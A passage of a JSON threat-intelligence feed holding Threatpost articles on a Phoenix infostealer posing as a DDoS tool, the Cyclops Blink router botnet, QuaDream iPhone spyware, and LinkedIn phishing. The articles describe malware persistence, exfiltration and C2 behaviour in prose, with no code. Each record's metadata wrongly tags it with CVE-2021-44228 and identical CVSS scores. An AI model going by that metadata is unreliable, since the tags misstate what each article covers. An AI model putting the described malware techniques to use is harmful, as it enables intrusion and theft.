"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T19:00:03", "id": "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "href": "https://threatpost.com/ftc-pursue-companies-log4j/177368/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T14:53:17", "description": "Looking to cyber-hassle Russia, Ukrainian sympathizers? Be careful \u2014 malware is making the rounds, disguised as a pro-Ukraine cyber-tool that will turn around and bite you instead, researchers are warning.\n\nIn a Wednesday [threat advisory](<https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html>), Cisco Talos described a campaign it\u2019s observed in which a threat actor was offering a supposed distributed denial-of-service (DDoS) tool on Telegram, that\u2019s purportedly meant to pummel Russian websites.\n\nIn truth, the file is actually the Phoenix infostealer that\u2019s after credentials and cryptocurrency info, according to researchers.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\nResearchers shared one such Telegram come-on, shown below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10114749/infostealer-disguised-as-Russian-attack-tool-e1646930888523.jpg>)\n\nInfostealer disguised as a Russian attack tool on Telegram. Source: Cisco Talos.\n\n\u201cWe are glad to remind you about the software we use to attack Russian sites!\u201d the message burbled, waiting to jump on unsuspecting users so as to bleed them of cryptocurrency stored in wallets and MetaMask (a cryptocurrency wallet software commonly associated with non-fungible tokens [NFTs]).\n\n## Cyber-Warzone Flooded with New Threats, Hacker Newbies\n\nThe malware dressed in sheep\u2019s clothing is just one more wrinkle in the cyber-threat landscape \u2013 a landscape that been undergoing seismic shifts leading up to and during Russia\u2019s invasion of Ukraine. The crisis has brought both new threats and an influx of actors \u201cof varying skill,\u201d Cisco said.\n\nFor example, the cyber-warzone has entailed the Conti ransomware gang\u2019s secrets [getting spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) (including a [decryptor and TrickBot code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>)) by a Ukrainian security researcher (per [KrebsOnSecurity](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>), citing Alex Holden, the Ukrainian-born founder of the Milwaukee-based cyber intelligence firm Hold Security), a pro-Ukrainian member; furious phishing campaigns [launched](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) against Ukraine and [those aiding](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) Ukrainian refugees; the novel FoxBlade [trojan;](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) DDoS [attacks](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against Ukraine\u2019s military and economy; campaigns using multiple destructive [wipers;](<https://threatpost.com/destructive-wiper-ukraine/177768/>) hackers affiliating themselves with the Anonymous collective [hijacking](<https://www.taiwannews.com.tw/en/news/4466470>) Russian cameras; and more.\n\n\u201cMany of these changes have been brought about by the rise in attacks being[ outsourced](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) to sympathetic people on the internet, which brings about its own unique challenges and threats,\u201d Cisco [outlined](<https://blog.talosintelligence.com/2022/03/ukraine-update.html>). The threat advisory referenced a [tweet](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) exhorting people to join an IT army to fight on the cyber-front.\n\n> We are creating an IT army. We need digital talents. All operational tasks will be given here: <https://t.co/Ie4ESfxoSn>. There will be tasks for everyone. We continue to fight on the cyber front. The first task is on the channel for cyber specialists.\n> \n> \u2014 Mykhailo Fedorov (@FedorovMykhailo) [February 26, 2022](<https://twitter.com/FedorovMykhailo/status/1497642156076511233?ref_src=twsrc%5Etfw>)\n\nSoldiers on the frontlines get shot at, of course, and soldiers on the cyber-frontlines run the risk of getting arrested. After all, no matter how noble the hacking cause, it\u2019s still potentially illegal, Cisco pointed out.\n\n## \u2018Legitimate\u2019 Disbalancer Liberator DDoS Tool\n\nThe malware in the Telegram message brands itself as a \u201cDisbalancer\u201d .ZIP file. There is, in fact, a group called \u201cdisBalancer\u201d that distributes a \u201clegitimate\u201d DDoS attack tool called, ironically enough, Liberator, Cisco found \u2013 a tool for waging cyberwar against \u201cRussian propaganda websites.\u201d\n\n\u201cA quick look at disBalancer\u2019s website shows that the actor uses similar language to the malicious message on Telegram\u2026and promises to target Russian sites with the stated goal of helping to \u2018liberate\u2019 Ukraine,\u201d according to Cisco\u2019s writeup.\n\nThe security company offered a screenshot of the brandjacking Disbalancer Liberator website, shown below. As Cisco pointed out, there\u2019s a typo in the group\u2019s name, which is rendered as \u201cdisBalancher.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10135135/Disbalancer-Liberator-e1646938312137.png>)\n\nScreenshot from Disbalancer Liberator website. Source: Cisco Talos.\n\ndisBalancer\u2019s tool \u2013 Disbalancer.exe \u2013 is sincerely meant to DDoS Russia. The infostealer campaign, on the other hand, is based on a dropper disguised as that tool. It\u2019s protected with ASProtect, Cisco said, a known packer for Windows executables.\n\n\u201cIf a researcher tries to debug the malware execution, it will be confronted with a general error. The malware, after performing the anti-debug checks, will launch Regsvcs.exe, which is included along with the .NET framework,\u201d according to the writeup. \u201cIn this case, the regsvcs.exe is not used as a living off the land binary (LoLBin). It is injected with the malicious code, which consists of the Phoenix information stealer.\u201d\n\nThe actors behind this campaign aren\u2019t the newbies flocking to the front lines. Rather, evidence shows that they\u2019ve been distributing infostealers since at least November, Cisco said, as evidenced by the fact that the infostealer exfiltrates stolen info to a remote IP address \u2013 in this case, a Russian IP \u2014 95[.]142.46.35 \u2014 on port 6666.\n\nThat IP/port pair \u201chas been distributing infostealers since at least November 2021,\u201d researchers said. The longevity of the pairing enforces researchers\u2019 belief that these are experienced actors at work, taking advantage of the Ukraine calamity, rather than threat actors new to the scene.\n\nThe infostealer is hoovering up a broad array of information, Cisco said. \u201cThe .ZIP file provided in the Telegram channel contains an executable, which is the infostealer,\u201d according to the report. \u201cThe infostealer gathers information from a variety of sources, including web browsers like Firefox and Chrome and other locations on the filesystem for key pieces of information.\u201d\n\nThe researchers provided a deobfuscated screen capture, replicated below, showing how the pilfered info is sent with a simple base64 encoding. The screen grab shows the breadth of information being pulled off of infected systems, including a large number of crypto wallets and information on MetaMask. \u201cA .ZIP file of the stolen data is also uploaded to the server, completing the compromise,\u201d Cisco said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10142913/Sample-data-exfiltrated-by-infostealer-e1646940569947.png>)\n\nSample data exfiltrated to server. Source: Cisco Talos.\n\n## Don\u2019t Eat That: You Don\u2019t Know Where It\u2019s Been\n\nThe infostealer masquerading as a DDoS tool to attack Russian targets is just one example of the many ways cybercriminals are milking the invasion for social-engineering sustenance, exploiting sympathizers on both sides. \u201cSuch activity could take the form of themed email lures on news topics or donation solicitations, malicious links purporting to host relief funds or refugee support sites, malware masquerading as security defensive or offensive tools, and more,\u201d researchers suggested.\n\nIn this case, cybercriminals were distributing an infostealer in an apparently profit-motivated campaign. It could have been worse, though, according to the report: \u201cIt could have just as easily been a more sophisticated state-sponsored actor or privateer group doing work on behalf of a nation-state.\u201d\n\nExpect this type of situational exploitation to continue and to diversify, Cisco predicted: \u201cThe global interest in the conflict creates a massive potential victim pool for threat actors and also contributes to a growing number of people interested in carrying out their own offensive cyber operations.\u201d\n\nCisco reminded users to essentially avoid eating food that\u2019s been dropped on the floor. You don\u2019t know where that stuff\u2019s been, researchers warned, so be wary of installing software \u201cwhose origins are unknown, especially software that is being dropped into random chat rooms on the internet.\u201d\n\nAs always, carefully inspect suspicious emails before opening attachments, Cisco advised, and validate software or other files before downloading.\n\n031122 0934 UPDATE: Corrected identification of Conti leaker.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T19:54:00", "type": "threatpost", "title": "Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T19:54:00", "id": "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "href": "https://threatpost.com/malware-posing-russia-ddos-tool-bites-pro-ukraine-hackers/178864/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T17:24:48", "description": "The modular botnet known as Cyclops Blink, linked to the same advanced persistent threat (APT) behind the [NotPetya wiper attacks](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), is expanding its device targeting to include ASUS routers.\n\nFurther, it\u2019s likely that the botnet\u2019s purpose is far more sinister than the average [Mirai-knockoff\u2019s penchant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) for distributed denial-of-service (DDoS) attacks.\n\nThat\u2019s the word from Trend Micro researchers, who noted that Cyclops Blink casts a wide net in terms of the owners of the devices it chooses to infect, with no specific focus on high-value government or diplomatic entities. While that\u2019s out of step with typical APT behavior, researchers said that it\u2019s likely the botnet will be used as persistent infrastructure for mounting further attacks on high-value targets, and as such, should be indiscriminately distributed for maximum effect.\n\n\u201cIt should be noted that these victims do not appear to be evidently valuable targets for either economic, military or political espionage,\u201d according to the firm\u2019s analysis. \u201cFor example, some of the live command-and-control servers (C2s) are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States.\u201d\n\nCyclops Blink itself has been around since 2019, initially looking to infect WatchGuard Firebox devices according to a [February analysis (PDF)](<https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf>) performed by the UK\u2019s National Cyber Security Centre (NCSC). Now, to further its goal of widescale infections, ASUS routers are now on the menu, Trend Micro noted, with the latest variant incorporating a fresh module tailored to the vendor\u2019s devices.\n\n\u201cOur research was carried out on the RT-AC68U, but other ASUS routers such as RT-AC56U might be affected as well,\u201d researchers said. \u201cOur investigation shows that there are more than 200 Cyclops Blink victims around the world. Typical countries of infected WatchGuard devices and ASUS routers are the United States, India, Italy, Canada and a long list of other countries, including Russia.\u201d\n\n## **A Sinister Purpose?**\n\nCyclops Blink is the handiwork of the Russian-speaking Sandworm APT (a.k.a. Voodoo Bear or TeleBots), according to Trend Micro \u2013 the same group that\u2019s been [linked to a host of](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) very high-profile state-sponsored attacks, as well as the VPNFilter internet-of-things (IoT) botnet.\n\n\u201cSandworm was also responsible for\u2026the [2015 and 2016 attacks on the Ukrainian electrical grid](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), the 2017 NotPetya attack, the 2017 French presidential campaign, the [2018 Olympic Destroyer attack](<https://threatpost.com/olympic-destroyer-malware-behind-winter-olympics-cyberattack-researchers-say/129918/>) on the Winter Olympic Games and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW),\u201d researchers noted in a [Thursday analysis](<https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html>).\n\nInternet routers have been a favorite target for building out botnets for many years, thanks to \u201cinfrequency of patching, the lack of security software and the limited visibility of defenders\u201d when it comes to these devices, as Trend Micro put it. More often than not, such botnets are used to carry out DDoS attacks; but in Cyclops Blink\u2019s case, the motives are less obvious.\n\n\u201cThe purpose of this botnet is still unclear: Whether it is intended to be used for DDoS attacks, espionage or proxy networks remains to be seen,\u201d researchers said. \u201cBut what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.\u201d\n\nIn fact, some of the infected devices that researchers observed have been compromised for more than two and a half years, with some set up as stable C2 servers for other bots.\n\nIt is thus likely, the researchers speculated, that Cyclops Blink is destined for bigger horizons than denial of service.\n\n\u201cThe more routers are compromised, the more sources of powerful data collection \u2014 and avenues for further attacks \u2014 become available to attackers,\u201d according to the analysis, which raised the specter of \u201ceternal botnets.\u201d\n\n\u201cOnce an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying or anything else that the attacker wants to do,\u201d researchers warned. \u201cThe underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.\u201d\n\nGiven Sandworm\u2019s track record, it\u2019s wise to expect the worst, the firm noted.\n\n\u201cSandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best,\u201d researchers said.\n\n## **A Few Technical Specifics on a New Botnet Variant**\n\nCoded in the C language, Cyclops Blink relies on hard-coded TCP ports to communicate with a range of command-and-control servers (C2s), according to the analysis. For each port, it creates a rule in the Netfilter Linux kernel firewall to allow output communication to it.\n\nOnce it\u2019s made contact, the malware initializes an OpenSSL library, and its core component then cranks up operations for a series of hard-coded modules.\n\n\u201cCommunication with the modules is performed via pipes,\u201d according to Trend Micro. \u201cFor each hard-coded module, the malware creates two pipes before executing them in their own child processes.\u201d\n\nThe malware then pushes various parameters to the modules, which in turn respond with data that the core component encrypts with OpenSSL functions before sending it to the C2 server.\n\n\u201cThe data is encrypted using AES-256 in cipher block chaining (CBC) mode with a randomly generated 256-bit key and 128-bit initialization vector (IV). It is then encrypted using a hard-coded RSA-2560 (320-bit) public key unique to each sample,\u201d according to the analysis. \u201cThe C2 server must have the corresponding RSA private key to decrypt the data.\u201d\n\nResearchers added, \u201cTo send data to the C2 server, the core component performs a TLS handshake with a randomly chosen C2 server at a random TCP port, both of which are from a hard-coded list.\u201d\n\nInitially, the core component sends a list of supported commands to the C2 server and then waits to receive one of the commands back. These can be aimed at the core component itself or to one of its modules, according to the writeup.\n\nIf a command targets the core component, it can be one of the following:\n\n * Terminate the program\n * Bypass the data-sending interval and send data to C2 servers immediately\n * Add a new C2 server to the list in memory\n * Set time to send the next packet to the C2 server\n * Set time to send the next packet to the C2 server\n * Add a new module (an ELF file should be received following the command)\n * Reload the malware\n * Set the local IP address parameter\n * Set a new worker ID\n * Set an unknown byte value\n * Resend configuration to all running modules\n\nAs for the commands meant for the modules, the latest variant studied by Trend Micro now includes \u201cAsus (0x38),\u201d meant to activate a brand-new module built to infect ASUS routers.\n\n**Targeting ASUS Routers**\n\nThe ASUS module is built to access and replace a router\u2019s flash memory, thus enslaving it to the botnet, researchers explained.\n\n\u201cThis module can read and write from the devices\u2019 flash memory,\u201d they said. \u201cThe flash memory is used by these devices to store the operating system, configuration and all files from the file system.\u201d\n\nCyclops Blink reads 80 bytes from the flash memory, writes it to the main pipe, and then waits for a command with the data needed to replace the content.\n\n\u201cAs the flash memory content is permanent, this module can be used to establish persistence and survive factory resets,\u201d researchers explained.\n\nA second module, straightforwardly called \u201csystem reconnaissance (0x08),\u201d is responsible for gathering various data from the infected device and sending it to the C2 server.\n\nSpecifically, it harvests:\n\n * The Linux version of the device\n * Information about the device\u2019s memory consumption\n * The SSD storage information\n * The content of the following files: \n * /etc/passwd\n * /etc/group\n * /proc/mounts\n * /proc/partitions\n * Information about network interfaces\n\nA third module, \u201cfile download (0x0f),\u201d can download files from the internet using DNS over HTTPS (DoH).\n\nTrend Micro noted that ASUS is likely not the only new module that will emerge for the botnet. After all, Sandworm\u2019s previous botnet, VPNFilter, targeted a wide range of router vendors, including ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL and ZDE.\n\n\u201cWe have evidence that other routers are affected too, but as of reporting, we were not able to collect Cyclops Blink malware samples for routers other than WatchGuard and ASUS,\u201d according to the analysis. \u201cBased on our observation, we strongly believe that there are more targeted devices from other vendors. This malware is modular in nature, and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.\u201d\n\n## **How to Defend Against Becoming a Botnet Victim**\n\nLike with other botnets, organizations can protect themselves from Cyclops Blink attacks by falling back on basic security hygiene, Trend Micro noted, including the use of strong passwords, using a virtual private network (VPN), regular firmware patching and so on. Most successful compromises are the result of default or weak password use or the exploitation of known vulnerabilities.\n\nIf an organization\u2019s devices have been infected with Cyclops Blink, researchers said that the best course of action is to chuck the victimized router for a new one, given the malware\u2019s prodigious persistence capabilities.\n\n\u201cIt is best to get a new router,\u201d they explained. \u201cPerforming a factory reset might blank out an organization\u2019s configuration, but not the underlying operating system that the attackers have modified. If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible. However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor. In such cases, an average user would not have the ability to fix a Cyclops Blink infection.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T17:17:17", "type": "threatpost", "title": "Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T17:17:17", "id": "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "href": "https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "ForcedEntry \u2013 the exploit of a zero-click iMessage zero day that [circumvented](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>) Apple\u2019s then-brand-new BlastDoor security feature starting a year ago \u2013 was picked apart not just by NSO Group with its Pegasus spyware but also by a newly uncovered, smaller smartphone-hacking toolmaker named QuaDream.\n\nReuters [published](<https://www.reuters.com/technology/exclusive-iphone-flaw-exploited-by-second-israeli-spy-firm-sources-2022-02-03/>) details on QuaDream last week. The outlet relied on input from five sources familiar with the matter, plus a look at two QuaDream product brochures dating from 2019 and 2020 that its reporters got their hands on.\n\nThree people familiar with the matter told Reuters that QuaDream and NSO Group have shared employees over the years. Two sources also said that QuaDream and NSO Group came up with the iPhone exploit techniques on their own, separately \u2014 as opposed to collaborating.\n\nIn September, Citizen Lab [published details about having captured](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) NSO Group\u2019s ForcedEntry exploit in the wild, though its security researchers believe that it was first used in February 2021. Apple had just introduced BlastDoor, a structural improvement in iOS 14 meant to block message-based, zero-click exploits \u2013 a month prior to when NSO Group is believed to have started using it.\n\nMonths earlier, in August, the privacy watchdog identified nine Bahraini activists whose iPhones were hacked with NSO Group\u2019s Pegasus spyware between June 2020 and last February. Some of the activists were attacked with what Citizen Lab came to call the 2021 ForcedEntry exploit, while others\u2019 devices were remotely exploited and infected with spyware by [the 2020 KISMET exploit](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>): another zero-click iMessage exploit.\n\nBlastDoor was supposed to prevent this type of attack by acting as what Google Project Zero\u2019s Samuel Gro\u00df called at the time a \u201ctightly sandboxed\u201d service responsible for \u201calmost all\u201d of the parsing of untrusted data in iMessages. The ForcedEntry exploit managed to circumvent BlastDoor by targeting Apple\u2019s image rendering library: a sophisticated attack that was effective against Apple iOS, MacOS and WatchOS devices.\n\n## QuaDream Got in on the Fun\n\nQuaDream was allegedly in on the Bahraini malware infections, it turns out, including an attack on one living in London at the time.\n\nAccording to Reuters, the firm was founded in 2016 by Ilan Dabelstein, a former Israeli military official, and by two former NSO employees, Guy Geva and Nimrod Reznik. Reuters\u2019 sources for QuaDream\u2019s background were Israeli corporate records and two people familiar with the business.\n\nIts 2016 founding means that QuaDream has spent more than five years hacking iPhones and other iGadgets, prying them open so as to monitor calls and get access to users\u2019 microphones and cameras in real time. This type of powerful spyware gives its users access to their targets\u2019 email, photos, texts, contacts and instant messages, even in spite of what should be the end-to-end encryption promised by services such as WhatsApp, Telegram or Signal.\n\n## There\u2019s So Much Talent Out There, Unfortunately\n\nCitizen Lab security researcher Bill Marczak, who\u2019s been studying both companies\u2019 tools, told Reuters that the zero-click capability of QuaDream\u2019s flagship product \u2013 called REIGN \u2013 seems \u201con par\u201d with NSO\u2019s Pegasus spyware.\n\nAs Reuters noted, security researchers at Google\u2019s Project Zero have called ForcedEntry [\u201cone of the most technically sophisticated exploits\u201d](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) they\u2019ve ever captured: an estimation confirmed by Citizen Lab director Ronald Deibert.\n\nOn Monday, he pointed to Project Zero\u2019s \u201cvery thorough\u201d analysis of ForcedEntry as having demonstrated the level of engineering talent available to companies like NSO Group and others in the mercenary spyware marketplace.\n\n\u201cThat spyware can be engineered with such sophistication and stealth, and then abused widely to target broad cross sections of civil society, should give everyone serious pause,\u201d he told Threatpost via email.\n\n## Israeli Police Linked to Widespread Pegasus Spying\n\nA related piece of news emerged on Monday. According to a new [report](<https://www.calcalistech.com/ctech/articles/0,7340,L-3928830,00.html>) from the Israeli newspaper Calcalist, dozens of prominent Israelis have been hacked with Pegasus, including a son of former premier Benjamin Netanyahu, activists and senior government officials.\n\n\u201cCEOs of government ministries, journalists, tycoons, corporate executives, mayors, social activists and even the Prime Minister\u2019s relatives, all were police targets, having their phones hacked by NSO\u2019s spyware, prior to any investigation even opening and without any judicial authorization,\u201d Calcalist reported.\n\nPegasus was also recently found on the devices of Finland\u2019s diplomatic corps serving outside the country as part of a wide-ranging espionage campaign, Finnish officials [claimed](<https://threatpost.com/nso-group-pegasus-spyware-finnish-diplomats/178113/>). In December, Pegasus was also [reportedly](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>) planted on the iPhones of at least nine U.S. State Department employees.\n\n## QuaDream: Less Known But Just as Powerful\n\nAccording to QuaDream\u2019s brochures for the REIGN \u201cPremium Collection,\u201d its malware tools offer similar capabilities as Pegasus, including \u201creal-time call recordings,\u201d \u201ccamera activation \u2013 front and back,\u201d and \u201cmicrophone activation,\u201d as Reuters reported.\n\nThe outlet\u2019s sources said that QuaDream and NSO Group share several buyers, including Saudi Arabia and Mexico, both of which are among the many governmental Pegasus buyers that have been accused of illegally using spyware to target political opponents. QuaDream\u2019s first clients also allegedly include the Singaporean government. As well, the firm apparently made a pitch to the Indonesian government, though Reuters couldn\u2019t determine whether Indonesia ponied up.\n\nIts prices appear to vary. According to the 2019 brochure, one offering that gave customers the ability to infect 50 devices per year was priced at $2.2 million, \u201cexclusive of maintenance costs,\u201d though two people familiar with REIGN\u2019s sales told Reuters that the price for REIGN \u201cwas typically higher.\u201d\n\n## How Vast *Is* the Spyware Market?\n\nKudos to Reuters for digging up details on QuaDream: not an easy task, given how murky the company is. It reportedly has no website, and employees have reportedly been told to stay mum about the company on their social-media posts.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, told Threatpost on Monday that discretion is the hallmark of spyware sellers. \u201cEvery intelligence agency worth their salt (or more accurately their budgets) are developing these kinds of exploits in house or via closely-associated companies who do not do business with many other countries,\u201d he said via email. \u201cChina, for instance, has done great work in mobile exploitation that seems to have been government performed effort. For every player we know about, there are dozens that are much more secretive.\u201d\n\nThe fact that there are more spyware-makers than just NSO Group is no shocker.\n\nThat was made clear in December by Meta, Facebook\u2019s parent company, which kicked six alleged spy-for-hire \u201ccyber-mercenaries\u201d [to the curb](<https://threatpost.com/facebook-bans-spy-hire/177149/>), along with a mysterious Chinese law-enforcement supplier. Meta accused the entities of collectively targeting about 50,000 people for surveillance, issued cease-and-desist warnings to six of the groups, and undertook the task of warning targeted people in more than 100 countries.\n\nMike Parkin, engineer at SaaS enterprise cyber-risk remediation firm Vulcan Cyber, told Threatpost that bleeding-edge attacks will continue to appear, given \u201can entire Dark-Web economy built around discovering exploits and selling them to the highest bidder, and state/state-sponsored actors having access to extraordinary financial and technical resources.\u201d\n\nThere are \u201calmost certainly\u201d exploits similar to ForcedEntry already being used in the wild, Parkin said: ones that haven\u2019t yet come to light \u201cbecause they are used sparingly and only against high-value targets.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T18:49:59", "type": "threatpost", "title": "QuaDream, 2nd Israeli Spyware Firm, Weaponizes iPhone Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T18:49:59", "id": "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "href": "https://threatpost.com/quadream-israeli-spyware-weaponized-iphone-bug/178252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T22:17:40", "description": "Emotionally vulnerable and willing to offer up any information that lands the gig, job seekers are prime targets for social engineering campaigns. And with the \u201cGreat Resignation\u201d in full swing, cybercriminals are having an easy time finding their next victim.\n\nJust since Feb. 1, analysts have watched [phishing email attacks impersonating LinkedIn](<https://www.egress.com/resources/cybersecurity-information/phishing/linkedin-phishing-attacks>) surge 232 percent, attempting to trick job seekers into giving up their credentials.\n\n\u201cCurrent employment trends help to make this attack more convincing,\u201d a new report from Egress said. \u201c\u2018The Great Resignation\u2019 continues to dominate headlines, and a record number of Americans left their jobs in 2021 for new opportunities. It is likely these phishing attacks aim to capitalize on jobseekers (plus curious individuals) by flattering them into believing their profile is being viewed and their experience is relevant to household brands.\u201d\n\nThe emails had subject lines that would be enticing to job hunters hoping to get noticed, like, \u201cWho\u2019s searching for you online,\u201d \u201cYou appeared in 4 searches this week\u201d or even \u201cYou have 1 new message,\u201d the Egress team said.\n\nThe [phishing emails](<https://threatpost.com/squirrelwaffle-fraud-exchange-server-malspamming/178434/>) themselves were convincing dupes, built in 